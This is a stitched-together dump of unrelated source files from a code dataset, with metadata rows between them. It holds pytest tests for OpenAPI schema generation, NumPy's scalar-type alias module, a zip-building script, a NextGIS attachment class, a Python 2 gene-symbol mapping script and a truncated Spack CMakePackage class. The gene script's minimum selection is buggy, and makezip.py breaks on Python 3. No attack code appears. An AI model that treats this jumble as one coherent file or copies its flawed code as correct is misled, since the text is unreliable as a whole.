                "mother": build_ref(spec_fixture.spec, "schema", "Pet"),
                "father": build_ref(spec_fixture.spec, "schema", "Pet"),
            },
        }
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_schema_partially_v3(self, spec_fixture):
        """v3: schemas nested inside a plain dict's properties become $refs."""
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.path(
            path="/parents",
            operations={
                "get": {
                    "responses": {
                        200: {
                            "content": {
                                "application/json": {
                                    "schema": {
                                        "type": "object",
                                        "properties": {
                                            "mother": PetSchema,
                                            "father": PetSchema,
                                        },
                                    }
                                }
                            }
                        }
                    }
                }
            },
        )
        get = get_paths(spec_fixture.spec)["/parents"]["get"]
        assert get["responses"]["200"]["content"]["application/json"]["schema"] == {
            "type": "object",
            "properties": {
                "mother": build_ref(spec_fixture.spec, "schema", "Pet"),
                "father": build_ref(spec_fixture.spec, "schema", "Pet"),
            },
        }
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_callback_schema_partially_v3(self, make_pet_callback_spec):
        """Partial (dict-embedded) schema resolution also applies in callbacks."""
        spec_fixture = make_pet_callback_spec(
            {
                "get": {
                    "responses": {
                        "200": {
                            "content": {
                                "application/json": {
                                    "schema": {
                                        "type": "object",
                                        "properties": {
                                            "mother": PetSchema,
                                            "father": PetSchema,
                                        },
                                    }
                                }
                            }
                        }
                    }
                }
            }
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
        get = c["get"]
        assert get["responses"]["200"]["content"]["application/json"]["schema"] == {
            "type": "object",
            "properties": {
                "mother": build_ref(spec_fixture.spec, "schema", "Pet"),
                "father": build_ref(spec_fixture.spec, "schema", "Pet"),
            },
        }
    def test_parameter_reference(self, spec_fixture):
        """A parameter given by name resolves to a parameter $ref."""
        if spec_fixture.spec.openapi_version.major < 3:
            param = {"schema": PetSchema}
        else:
            param = {"content": {"application/json": {"schema": PetSchema}}}
        spec_fixture.spec.components.parameter("Pet", "body", param)
        spec_fixture.spec.path(
            path="/parents", operations={"get": {"parameters": ["Pet"]}}
        )
        get = get_paths(spec_fixture.spec)["/parents"]["get"]
        assert get["parameters"] == [build_ref(spec_fixture.spec, "parameter", "Pet")]
    def test_response_reference(self, spec_fixture):
        """A response given by name resolves to a response $ref."""
        if spec_fixture.spec.openapi_version.major < 3:
            resp = {"schema": PetSchema}
        else:
            resp = {"content": {"application/json": {"schema": PetSchema}}}
        spec_fixture.spec.components.response("Pet", resp)
        spec_fixture.spec.path(
            path="/parents", operations={"get": {"responses": {"200": "Pet"}}}
        )
        get = get_paths(spec_fixture.spec)["/parents"]["get"]
        assert get["responses"] == {
            "200": build_ref(spec_fixture.spec, "response", "Pet")
        }
    def test_schema_global_state_untouched_2json(self, spec_fixture):
        """schema2jsonschema must not mutate the class-level Nested field state."""
        assert get_nested_schema(RunSchema, "sample") is None
        data = spec_fixture.openapi.schema2jsonschema(RunSchema)
        json.dumps(data)
        assert get_nested_schema(RunSchema, "sample") is None
    def test_schema_global_state_untouched_2parameters(self, spec_fixture):
        """schema2parameters must not mutate the class-level Nested field state."""
        assert get_nested_schema(RunSchema, "sample") is None
        data = spec_fixture.openapi.schema2parameters(RunSchema, location="json")
        json.dumps(data)
        assert get_nested_schema(RunSchema, "sample") is None
    def test_resolve_schema_dict_ref_as_string(self, spec):
        """A schema given as a bare string name resolves to a $ref."""
        schema = {"schema": "PetSchema"}
        if spec.openapi_version.major >= 3:
            schema = {"content": {"application/json": schema}}
        spec.path("/pet/{petId}", operations={"get": {"responses": {"200": schema}}})
        resp = get_paths(spec)["/pet/{petId}"]["get"]["responses"]["200"]
        if spec.openapi_version.major < 3:
            schema = resp["schema"]
        else:
            schema = resp["content"]["application/json"]["schema"]
        assert schema == build_ref(spec, "schema", "PetSchema")
class TestCircularReference:
    """Schemas referencing each other are resolved without infinite recursion."""
    def test_circular_referencing_schemas(self, spec):
        """Registering Analysis auto-registers Sample and links it via $ref."""
        spec.components.schema("Analysis", schema=AnalysisSchema)
        definitions = get_schemas(spec)
        ref = definitions["Analysis"]["properties"]["sample"]
        assert ref == build_ref(spec, "schema", "Sample")
# Regression tests for issue #55
class TestSelfReference:
    """Self-referencing Nested fields resolve to the schema's own $ref."""
    def test_self_referencing_field_single(self, spec):
        """A single self-nested field becomes a $ref to the same component."""
        spec.components.schema("SelfReference", schema=SelfReferencingSchema)
        definitions = get_schemas(spec)
        ref = definitions["SelfReference"]["properties"]["single"]
        assert ref == build_ref(spec, "schema", "SelfReference")
    def test_self_referencing_field_many(self, spec):
        """A many=True self-nested field becomes an array of self $refs."""
        spec.components.schema("SelfReference", schema=SelfReferencingSchema)
        definitions = get_schemas(spec)
        result = definitions["SelfReference"]["properties"]["many"]
        assert result == {
            "type": "array",
            "items": build_ref(spec, "schema", "SelfReference"),
        }
class TestOrderedSchema:
    """Field declaration order is preserved in the generated properties."""
    def test_ordered_schema(self, spec):
        spec.components.schema("Ordered", schema=OrderedSchema)
        result = get_schemas(spec)["Ordered"]["properties"]
        assert list(result.keys()) == ["field1", "field2", "field3", "field4", "field5"]
class TestFieldWithCustomProps:
    """Custom field metadata is emitted as x-prefixed extension properties."""
    def test_field_with_custom_props(self, spec):
        spec.components.schema("PatternedObject", schema=PatternedObjectSchema)
        result = get_schemas(spec)["PatternedObject"]["properties"]["count"]
        assert "x-count" in result
        assert result["x-count"] == 1
    def test_field_with_custom_props_passed_as_snake_case(self, spec):
        """snake_case metadata keys are converted to the x-... form."""
        spec.components.schema("PatternedObject", schema=PatternedObjectSchema)
        result = get_schemas(spec)["PatternedObject"]["properties"]["count2"]
        assert "x-count2" in result
        assert result["x-count2"] == 2
class TestSchemaWithDefaultValues:
    """Field defaults are emitted for concrete values, not for callables."""
    def test_schema_with_default_values(self, spec):
        spec.components.schema("DefaultValuesSchema", schema=DefaultValuesSchema)
        definitions = get_schemas(spec)
        props = definitions["DefaultValuesSchema"]["properties"]
        assert props["number_auto_default"]["default"] == 12
        assert props["number_manual_default"]["default"] == 42
        # Callable defaults cannot be serialized, so no "default" key appears.
        assert "default" not in props["string_callable_default"]
        assert props["string_manual_default"]["default"] == "Manual"
        assert "default" not in props["numbers"]
class TestDictValues:
    """Dict fields map to OpenAPI objects via additionalProperties."""
    def test_dict_values_resolve_to_additional_properties(self, spec):
        """Dict(values=String()) yields additionalProperties of type string."""
        class SchemaWithDict(Schema):
            dict_field = Dict(values=String())
        spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
        result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
        assert result == {"type": "object", "additionalProperties": {"type": "string"}}
    def test_dict_with_empty_values_field(self, spec):
        """Dict() without a values field yields a bare object."""
        class SchemaWithDict(Schema):
            dict_field = Dict()
        spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
        result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
        assert result == {"type": "object"}
    def test_dict_with_nested(self, spec):
        """Dict(values=Nested(...)) registers the nested schema and refs it."""
        class SchemaWithDict(Schema):
            dict_field = Dict(values=Nested(PetSchema))
        spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
        assert len(get_schemas(spec)) == 2
        result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
        assert result == {
            "additionalProperties": build_ref(spec, "schema", "Pet"),
            "type": "object",
        }
class TestList:
    """List(Nested(...)) maps to an array whose items are a $ref."""
    def test_list_with_nested(self, spec):
        class SchemaWithList(Schema):
            list_field = List(Nested(PetSchema))
        spec.components.schema("SchemaWithList", schema=SchemaWithList)
        assert len(get_schemas(spec)) == 2
        result = get_schemas(spec)["SchemaWithList"]["properties"]["list_field"]
        assert result == {"items": build_ref(spec, "schema", "Pet"), "type": "array"}
class TestTimeDelta:
    """TimeDelta fields record their precision as an x-unit extension."""
    def test_timedelta_x_unit(self, spec):
        class SchemaWithTimeDelta(Schema):
            sec = TimeDelta("seconds")
            day = TimeDelta("days")
        spec.components.schema("SchemaWithTimeDelta", schema=SchemaWithTimeDelta)
        assert (
            get_schemas(spec)["SchemaWithTimeDelta"]["properties"]["sec"]["x-unit"]
            == "seconds"
        )
        assert (
            get_schemas(spec)["SchemaWithTimeDelta"]["properties"]["day"]["x-unit"]
            == "days"
        )
"""
Due to compatibility, numpy has a very large number of different naming
conventions for the scalar types (those subclassing from `numpy.generic`).
This file produces a convoluted set of dictionaries mapping names to types,
and sometimes other mappings too.
.. data:: allTypes
A dictionary of names to types that will be exposed as attributes through
``np.core.numerictypes.*``
.. data:: sctypeDict
Similar to `allTypes`, but maps a broader set of aliases to their types.
.. data:: sctypes
A dictionary keyed by a "type group" string, providing a list of types
under that group.
"""
from numpy.compat import unicode
from numpy.core._string_helpers import english_lower
from numpy.core.multiarray import typeinfo, dtype
from numpy.core._dtype import _kind_name
sctypeDict = {} # Contains all leaf-node scalar types with aliases
allTypes = {} # Collect the types we will add to the module
# separate the actual type info from the abstract base classes
_abstract_types = {}      # lowercase name -> abstract scalar base class
_concrete_typeinfo = {}   # lowercase name -> typeinfo entry (has .type, .bits, ...)
for k, v in typeinfo.items():
    # make all the keys lowercase too
    k = english_lower(k)
    # Abstract bases are plain type objects; concrete entries carry typeinfo.
    if isinstance(v, type):
        _abstract_types[k] = v
    else:
        _concrete_typeinfo[k] = v
# The set of all concrete scalar type objects, for fast membership tests.
_concrete_types = {v.type for k, v in _concrete_typeinfo.items()}
def _bits_of(obj):
    """Return the bit width of the scalar type *obj*.

    Known concrete types report the width from their typeinfo entry;
    abstract types have no width and raise ValueError; any other type is
    assumed to be third-party and its width is inferred from its dtype.
    """
    for entry in _concrete_typeinfo.values():
        if entry.type is obj:
            return entry.bits
    if obj in _abstract_types.values():
        raise ValueError("Cannot count the bits of an abstract type")
    # some third-party type - make a best-guess from the dtype's item size
    return dtype(obj).itemsize * 8
def bitname(obj):
    """Return ``(base, bits, char)`` - a bit-width name for type *obj*.

    ``base`` is the dtype kind name (e.g. ``'int'``), ``bits`` the bit
    width (forced to 0 for object types), and ``char`` the dtype character,
    suffixed with the byte width whenever the width is nonzero.
    """
    raw_bits = _bits_of(obj)
    dt = dtype(obj)
    base = _kind_name(dt)
    # Object types have no meaningful width.
    bits = 0 if base == 'object' else raw_bits
    char = dt.kind if bits == 0 else "%s%d" % (dt.kind, bits // 8)
    return base, bits, char
def _add_types():
    """Register every concrete type under its C name, char code and type
    number, and every abstract class under its lowercased name."""
    for type_name, entry in _concrete_typeinfo.items():
        # define C-name and insert typenum and typechar references also
        allTypes[type_name] = entry.type
        sctypeDict[type_name] = entry.type
        sctypeDict[entry.char] = entry.type
        sctypeDict[entry.num] = entry.type
    for type_name, abstract_cls in _abstract_types.items():
        allTypes[type_name] = abstract_cls
_add_types()
# This is the priority order used to assign the bit-sized NPY_INTxx names, which
# must match the order in npy_common.h in order for NPY_INTxx and np.intxx to be
# consistent.
# If two C types have the same size, then the earliest one in this list is used
# as the sized name.
_int_ctypes = ['long', 'longlong', 'int', 'short', 'byte']
_uint_ctypes = list('u' + t for t in _int_ctypes)
def _add_aliases():
    """Register bit-width aliases (e.g. ``float64``) for non-integer types.

    Integer types are skipped here; they are handled by
    ``_add_integer_aliases`` so the priority order above is respected.
    """
    for name, info in _concrete_typeinfo.items():
        # these are handled by _add_integer_aliases
        if name in _int_ctypes or name in _uint_ctypes:
            continue
        # insert bit-width version for this class (if relevant)
        base, bit, char = bitname(info.type)
        myname = "%s%d" % (base, bit)
        # ensure that (c)longdouble does not overwrite the aliases assigned to
        # (c)double
        if name in ('longdouble', 'clongdouble') and myname in allTypes:
            continue
        allTypes[myname] = info.type
        # add mapping for both the bit name and the numarray name
        sctypeDict[myname] = info.type
        # add forward, reverse, and string mapping to numarray
        sctypeDict[char] = info.type
    # Add deprecated numeric-style type aliases manually, at some point
    # we may want to deprecate the lower case "bytes0" version as well.
    for name in ["Bytes0", "Datetime64", "Str0", "Uint32", "Uint64"]:
        if english_lower(name) not in allTypes:
            # Only one of Uint32 or Uint64, aliases of `np.uintp`, was (and is) defined, note that this
            # is not UInt32/UInt64 (capital i), which is removed.
            continue
        allTypes[name] = allTypes[english_lower(name)]
        sctypeDict[name] = sctypeDict[english_lower(name)]
_add_aliases()
def _add_integer_aliases():
    """Register sized integer aliases (``int8``/``i1`` ... and unsigned).

    Iterates in the NPY_INTxx priority order defined by ``_int_ctypes``;
    when two C types share a bit width, only the first claims the name.
    """
    seen_bits = set()
    for i_ctype, u_ctype in zip(_int_ctypes, _uint_ctypes):
        i_info = _concrete_typeinfo[i_ctype]
        u_info = _concrete_typeinfo[u_ctype]
        bits = i_info.bits  # same for both
        for info, charname, intname in [
                (i_info,'i%d' % (bits//8,), 'int%d' % bits),
                (u_info,'u%d' % (bits//8,), 'uint%d' % bits)]:
            if bits not in seen_bits:
                # sometimes two different types have the same number of bits
                # if so, the one iterated over first takes precedence
                allTypes[intname] = info.type
                sctypeDict[intname] = info.type
                sctypeDict[charname] = info.type
            seen_bits.add(bits)
_add_integer_aliases()
# We use these later
void = allTypes['void']
#
# Rework the Python names (so that float and complex and int are consistent
# with Python usage)
#
def _set_up_aliases():
    """Add Python-flavoured aliases (``float_``, ``int_``, ...) and remove
    names that would shadow Python builtins or stdlib modules."""
    type_pairs = [('complex_', 'cdouble'),
                  ('int0', 'intp'),
                  ('uint0', 'uintp'),
                  ('single', 'float'),
                  ('csingle', 'cfloat'),
                  ('singlecomplex', 'cfloat'),
                  ('float_', 'double'),
                  ('intc', 'int'),
                  ('uintc', 'uint'),
                  ('int_', 'long'),
                  ('uint', 'ulong'),
                  ('cfloat', 'cdouble'),
                  ('longfloat', 'longdouble'),
                  ('clongfloat', 'clongdouble'),
                  ('longcomplex', 'clongdouble'),
                  ('bool_', 'bool'),
                  ('bytes_', 'string'),
                  ('string_', 'string'),
                  ('str_', 'unicode'),
                  ('unicode_', 'unicode'),
                  ('object_', 'object')]
    for alias, t in type_pairs:
        allTypes[alias] = allTypes[t]
        sctypeDict[alias] = sctypeDict[t]
    # Remove aliases overriding python types and modules
    to_remove = ['ulong', 'object', 'int', 'float',
                 'complex', 'bool', 'string', 'datetime', 'timedelta',
                 'bytes', 'str']
    for t in to_remove:
        try:
            del allTypes[t]
            del sctypeDict[t]
        except KeyError:
            # not every name exists on every platform; removal is best-effort
            pass
_set_up_aliases()
# Concrete types grouped by kind; the numeric groups are filled in size
# order by _set_array_types below.
sctypes = {'int': [],
           'uint':[],
           'float':[],
           'complex':[],
           'others':[bool, object, bytes, unicode, void]}
def _add_array_type(typename, bits):
    # Append the sized alias (e.g. 'int64') to its group, silently skipping
    # widths that do not exist on this platform.
    try:
        t = allTypes['%s%d' % (typename, bits)]
    except KeyError:
        pass
    else:
        sctypes[typename].append(t)
def _set_array_types():
    """Fill the ``sctypes`` groups in increasing size order, then splice the
    pointer-sized integer (``intp``/``uintp``) into the right position if it
    is not already one of the listed C integer types."""
    ibytes = [1, 2, 4, 8, 16, 32, 64]
    fbytes = [2, 4, 8, 10, 12, 16, 32, 64]
    for bytes in ibytes:
        bits = 8*bytes
        _add_array_type('int', bits)
        _add_array_type('uint', bits)
    for bytes in fbytes:
        bits = 8*bytes
        _add_array_type('float', bits)
        # complex types are twice the width of the matching float
        _add_array_type('complex', 2*bits)
    # 'p' is the platform pointer-sized signed integer
    _gi = dtype('p')
    if _gi.type not in sctypes['int']:
        indx = 0
        sz = _gi.itemsize
        # find the first slot whose itemsize exceeds the pointer size
        _lst = sctypes['int']
        while (indx < len(_lst) and sz >= _lst[indx](0).itemsize):
            indx += 1
        sctypes['int'].insert(indx, _gi.type)
        # 'P' is the matching unsigned pointer-sized integer
        sctypes['uint'].insert(indx, dtype('P').type)
_set_array_types()
# Add additional strings to the sctypeDict
_toadd = ['int', 'float', 'complex', 'bool', 'object',
          'str', 'bytes', ('a', 'bytes_')]
for name in _toadd:
    if isinstance(name, tuple):
        # a tuple maps an extra char code (e.g. 'a') to an existing alias
        sctypeDict[name[0]] = allTypes[name[1]]
    else:
        # plain names map to their trailing-underscore scalar (e.g. 'int_')
        sctypeDict[name] = allTypes['%s_' % name]
del _toadd, name
| bsd-3-clause | -6,382,904,487,549,934,000 | 31.127572 | 103 | 0.571923 | false | 3.654963 | false | false | false |
PlushBeaver/FanFicFare | makezip.py | 2 | 1915 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015, Jim Miller
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, zipfile, sys
from glob import glob
def addFolderToZip(myZipFile,folder,exclude=[]):
    # Recursively add the contents of `folder` to the open ZipFile
    # `myZipFile`, skipping entries matched by the glob patterns in
    # `exclude` (patterns are evaluated relative to `folder`).
    # NOTE(review): Python 2 era code -- on Python 3, encode() returns
    # bytes and the str concatenations below would raise TypeError.
    # NOTE(review): the mutable default `exclude=[]` is shared between
    # calls; harmless here because it is never mutated, but fragile.
    folder = folder.encode('ascii') #convert path to ascii for ZipFile Method
    excludelist=[]
    for ex in exclude:
        excludelist.extend(glob(folder+"/"+ex))
    for file in glob(folder+"/*"):
        # `file` shadows the Python 2 builtin of the same name
        if file in excludelist:
            continue
        if os.path.isfile(file):
            #print file
            myZipFile.write(file, file, zipfile.ZIP_DEFLATED)
        elif os.path.isdir(file):
            # recurse into subdirectories with the same exclusion patterns
            addFolderToZip(myZipFile,file,exclude=exclude)
def createZipFile(filename,mode,files,exclude=[]):
    # Create (or append to, depending on `mode`) the zip archive `filename`
    # from the paths in `files`; directories are added recursively via
    # addFolderToZip. `exclude` holds glob patterns evaluated against the
    # current working directory. Returns (1, <last archived basename>).
    myZipFile = zipfile.ZipFile( filename, mode ) # Open the zip file for writing
    excludelist=[]
    for ex in exclude:
        excludelist.extend(glob(ex))
    for file in files:
        if file in excludelist:
            continue
        file = file.encode('ascii') #convert path to ascii for ZipFile Method
        if os.path.isfile(file):
            # NOTE(review): rebinds `filename`, so the returned name is the
            # basename of the last file added, not the archive name.
            (filepath, filename) = os.path.split(file)
            #print file
            myZipFile.write( file, filename, zipfile.ZIP_DEFLATED )
        if os.path.isdir(file):
            addFolderToZip(myZipFile,file,exclude=exclude)
    myZipFile.close()
    return (1,filename)
| gpl-3.0 | 878,587,940,607,048,700 | 34.826923 | 81 | 0.652219 | false | 4.057203 | false | false | false |
nextgis/ngq_compulink | qgis-installer/customization-conf/plugins/identifyplus/ngw_external_api_python/core/ngw_attachment.py | 2 | 2647 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
NextGIS WEB API
-------------------
begin : 2014-11-19
git sha : $Format:%H$
copyright : (C) 2014 by NextGIS
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
def FEATURE_ATTACHMENT_URL(res_id, feature_id, attachment_id):
    """Return the REST path of one attachment of a vector-layer feature."""
    return '/api/resource/%d/feature/%d/attachment/%d' % (res_id, feature_id, attachment_id)


def IMAGE_URL(res_id, feature_id, image_id):
    """Return the REST path of the image payload of an attachment.

    Uses ``%d`` for every id, matching FEATURE_ATTACHMENT_URL; the original
    mixed ``%s``/``%d`` even though both helpers receive the same integer
    resource id (``common.id``) from NGWAttachment below.
    """
    return '/api/resource/%d/feature/%d/attachment/%d/image' % (res_id, feature_id, image_id)
class NGWAttachment(object):
    """One attachment of an NGW vector-layer feature.

    Thin wrapper over the NextGIS Web REST API: all methods build URLs from
    the owning feature/resource ids and delegate HTTP calls to the
    connection object of the resource factory.
    """
    def __init__(self, attachment_id, ngw_feature):
        self.id = attachment_id          # attachment id on the server
        self.ngw_feature = ngw_feature   # owning NGWFeature instance
    def get_attachmet_url(self):
        # NOTE(review): the "attachmet" typo is part of the public API;
        # renaming it would break existing callers.
        return FEATURE_ATTACHMENT_URL(self.ngw_feature.ngw_resource.common.id, self.ngw_feature.id, self.id)
    def unlink(self):
        # Delete this attachment on the server.
        self.ngw_feature.ngw_resource._res_factory.connection.delete(self.get_attachmet_url())
    def get_image_url(self):
        # Server-relative URL of the attachment's image payload.
        return IMAGE_URL(self.ngw_feature.ngw_resource.common.id, self.ngw_feature.id, self.id)
    def get_image_full_url(self):
        # Absolute URL: server base + relative image URL.
        return self.ngw_feature.ngw_resource._res_factory.connection.server_url + self.get_image_url()
    def get_image(self):
        """Download the image and return ``[name, format, content]``.

        Falls back to ``image_<id>`` when the attachment has no name, and
        to ``"jpeg"`` when the mime type is not of the form ``image/<fmt>``.
        """
        attachment_info = self.ngw_feature.ngw_resource._res_factory.connection.get( self.get_attachmet_url() )
        name = attachment_info['name']
        if name is None:
            name = "image_%d"%attachment_info['id']
        format = attachment_info['mime_type'].split('/')
        if len(format) == 2:
            format = format[1]
        else:
            format = "jpeg"
        file_contetnt = self.ngw_feature.ngw_resource._res_factory.connection.download_file( self.get_image_url() )
        return [name, format, file_contetnt]
elaeon/breast_cancer_networks | scripts_toolbox/id_genes2id_pvalue.py | 2 | 2007 | import csv
import sys
# Open the file containing the Affy ids and gene symbols.
id_gene = csv.reader(open("id_gene_HG.csv", 'rb'), delimiter = ',')
dict = {}
aff_id = []
# Load every row into a dictionary, also keeping the Affy ids in an
# auxiliary list so the dictionary can later be walked in file order.
# NOTE(review): `dict` shadows the builtin of the same name.
for row in id_gene:
    dict[row[0]] = row[1]
    aff_id.append(row[0])
# Drop the header row from both structures.
aff_id.remove("Probe Set ID")
del dict["Probe Set ID"]
# Open the file with the p-values and loadings and read it into
# parallel lists (name, p-value, loading).
name_pvalue = open("name_pvalue_1191.txt", 'rb')
name = []
pv = []
loads = []
for row in name_pvalue:
    p = row.split("\t")
    name.append(p[0])
    pv.append(p[2])
    loads.append(p[1].strip())
# Close the input file.
name_pvalue.close()
# Open a new file to write the output.
salida = open("id_loads.txt", "w") # would the csv module be a better fit?
# Write the header line.
salida.writelines(["Affy_id","\t\t", "gene_symbol", "\n"])
# Split the gene-symbol field of every dictionary entry on " /// ".
for entry in aff_id:
    #print (entry, "--->" ,dict[entry])
    sp = dict[entry].split(" /// ")
    aux = []
    # For each candidate symbol, find its row in the parallel lists so the
    # candidates' loadings can be compared.
    for chunk in sp:
        for i in range(len(name)):
            #print (name[i].replace("\"",""), chunk)
            if name[i].replace("\"","") == chunk :
                aux.append([name[i],pv[i],loads[i]])
                break
    # Keep the candidate with the smallest loading (" NF " when none matched).
    if len(aux) == 0:
        salida.writelines([entry,"\t\t"," NF ", "\n"])
        print "paso 0"
    elif len(aux) == 1:
        salida.writelines([entry,"\t\t", aux[0][0], "\n"])
        print "paso 1"
    else:
        m = 0
        # NOTE(review): this only compares consecutive pairs and compares
        # the loadings lexicographically (they are strings), so it does not
        # necessarily select the minimum of the whole list.
        for i in range(len(aux)-1):
            if aux[i][2] < aux[i+1][2]:
                m = i
            else:
                m = i+1
        '''
        val, idx = min((val, idx) for (idx, val) in enumerate(aux))
        '''
        print "paso 2"
        print m
        salida.writelines([entry,"\t\t", aux[m][0], "\n"])
# Close the output file.
salida.close()
| gpl-3.0 | 2,634,669,533,301,764,000 | 25.76 | 154 | 0.642252 | false | 2.453545 | false | false | false |
rspavel/spack | lib/spack/spack/build_systems/cmake.py | 3 | 14333 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import inspect
import os
import platform
import re
import spack.build_environment
from llnl.util.filesystem import working_dir
from spack.util.environment import filter_system_paths
from spack.directives import depends_on, variant
from spack.package import PackageBase, InstallError, run_after
# Regex to extract the primary generator from the CMake generator
# string.
_primary_generator_extractor = re.compile(r'(?:.* - )?(.*)')
def _extract_primary_generator(generator):
"""Use the compiled regex _primary_generator_extractor to extract the
primary generator from the generator string which may contain an
optional secondary generator.
"""
primary_generator = _primary_generator_extractor.match(generator).group(1)
return primary_generator
class CMakePackage(PackageBase):
    """Specialized class for packages built using CMake
    For more information on the CMake build system, see:
    https://cmake.org/cmake/help/latest/
    This class provides three phases that can be overridden:
        1. :py:meth:`~.CMakePackage.cmake`
        2. :py:meth:`~.CMakePackage.build`
        3. :py:meth:`~.CMakePackage.install`
    They all have sensible defaults and for many packages the only thing
    necessary will be to override :py:meth:`~.CMakePackage.cmake_args`.
    For a finer tuning you may also override:
        +-----------------------------------------------+--------------------+
        | **Method**                                    | **Purpose**        |
        +===============================================+====================+
        | :py:meth:`~.CMakePackage.root_cmakelists_dir` | Location of the    |
        |                                               | root CMakeLists.txt|
        +-----------------------------------------------+--------------------+
        | :py:meth:`~.CMakePackage.build_directory`     | Directory where to |
        |                                               | build the package  |
        +-----------------------------------------------+--------------------+
    The generator used by CMake can be specified by providing the
    generator attribute. Per
    https://cmake.org/cmake/help/git-master/manual/cmake-generators.7.html,
    the format is: [<secondary-generator> - ]<primary_generator>. The
    full list of primary and secondary generators supported by CMake may
    be found in the documentation for the version of CMake used;
    however, at this time Spack supports only the primary generators
    "Unix Makefiles" and "Ninja." Spack's CMake support is agnostic with
    respect to primary generators. Spack will generate a runtime error
    if the generator string does not follow the prescribed format, or if
    the primary generator is not supported.
    """
    #: Phases of a CMake package
    phases = ['cmake', 'build', 'install']
    #: This attribute is used in UI queries that need to know the build
    #: system base class
    build_system_class = 'CMakePackage'
    # Targets passed to the generator during the build and install phases.
    build_targets = []
    install_targets = ['install']
    # Callbacks run after 'build' when tests are requested.
    build_time_test_callbacks = ['check']
    #: The build system generator to use.
    #:
    #: See ``cmake --help`` for a list of valid generators.
    #: Currently, "Unix Makefiles" and "Ninja" are the only generators
    #: that Spack supports. Defaults to "Unix Makefiles".
    #:
    #: See https://cmake.org/cmake/help/latest/manual/cmake-generators.7.html
    #: for more information.
    generator = 'Unix Makefiles'
    # https://cmake.org/cmake/help/latest/variable/CMAKE_BUILD_TYPE.html
    variant('build_type', default='RelWithDebInfo',
            description='CMake build type',
            values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
    depends_on('cmake', type='build')
    @property
    def archive_files(self):
        """Files to archive for packages based on CMake"""
        return [os.path.join(self.build_directory, 'CMakeCache.txt')]
    @property
    def root_cmakelists_dir(self):
        """The relative path to the directory containing CMakeLists.txt
        This path is relative to the root of the extracted tarball,
        not to the ``build_directory``. Defaults to the current directory.
        :return: directory containing CMakeLists.txt
        """
        return self.stage.source_path
    @property
    def std_cmake_args(self):
        """Standard cmake arguments provided as a property for
        convenience of package writers
        :return: standard cmake arguments
        """
        # standard CMake arguments
        std_cmake_args = CMakePackage._std_args(self)
        # flags computed by flags_to_build_system_args, if any
        std_cmake_args += getattr(self, 'cmake_flag_args', [])
        return std_cmake_args
    @staticmethod
    def _std_args(pkg):
        """Computes the standard cmake arguments for a generic package"""
        try:
            generator = pkg.generator
        except AttributeError:
            generator = 'Unix Makefiles'
        # Make sure a valid generator was chosen
        valid_primary_generators = ['Unix Makefiles', 'Ninja']
        primary_generator = _extract_primary_generator(generator)
        if primary_generator not in valid_primary_generators:
            msg = "Invalid CMake generator: '{0}'\n".format(generator)
            msg += "CMakePackage currently supports the following "
            msg += "primary generators: '{0}'".\
                format("', '".join(valid_primary_generators))
            raise InstallError(msg)
        try:
            build_type = pkg.spec.variants['build_type'].value
        except KeyError:
            build_type = 'RelWithDebInfo'
        define = CMakePackage.define
        args = [
            '-G', generator,
            define('CMAKE_INSTALL_PREFIX', pkg.prefix),
            define('CMAKE_BUILD_TYPE', build_type),
        ]
        if primary_generator == 'Unix Makefiles':
            # echo build commands so the build log is useful for debugging
            args.append(define('CMAKE_VERBOSE_MAKEFILE', True))
        if platform.mac_ver()[0]:
            args.extend([
                define('CMAKE_FIND_FRAMEWORK', "LAST"),
                define('CMAKE_FIND_APPBUNDLE', "LAST"),
            ])
        # Set up CMake rpath
        args.extend([
            define('CMAKE_INSTALL_RPATH_USE_LINK_PATH', False),
            define('CMAKE_INSTALL_RPATH',
                   spack.build_environment.get_rpaths(pkg)),
        ])
        # CMake's find_package() looks in CMAKE_PREFIX_PATH first, help CMake
        # to find immediate link dependencies in right places:
        deps = [d.prefix for d in
                pkg.spec.dependencies(deptype=('build', 'link'))]
        deps = filter_system_paths(deps)
        args.append(define('CMAKE_PREFIX_PATH', deps))
        return args
    @staticmethod
    def define(cmake_var, value):
        """Return a CMake command line argument that defines a variable.
        The resulting argument will convert boolean values to OFF/ON
        and lists/tuples to CMake semicolon-separated string lists. All other
        values will be interpreted as strings.
        Examples:
            .. code-block:: python
                [define('BUILD_SHARED_LIBS', True),
                 define('CMAKE_CXX_STANDARD', 14),
                 define('swr', ['avx', 'avx2'])]
            will generate the following configuration options:
            .. code-block:: console
                ["-DBUILD_SHARED_LIBS:BOOL=ON",
                 "-DCMAKE_CXX_STANDARD:STRING=14",
                 "-DSWR:STRING=avx;avx2]
        """
        # Create a list of pairs. Each pair includes a configuration
        # option and whether or not that option is activated
        if isinstance(value, bool):
            kind = 'BOOL'
            value = "ON" if value else "OFF"
        else:
            kind = 'STRING'
            if isinstance(value, (list, tuple)):
                # CMake lists are semicolon-separated
                value = ";".join(str(v) for v in value)
            else:
                value = str(value)
        return "".join(["-D", cmake_var, ":", kind, "=", value])
    def define_from_variant(self, cmake_var, variant=None):
        """Return a CMake command line argument from the given variant's value.
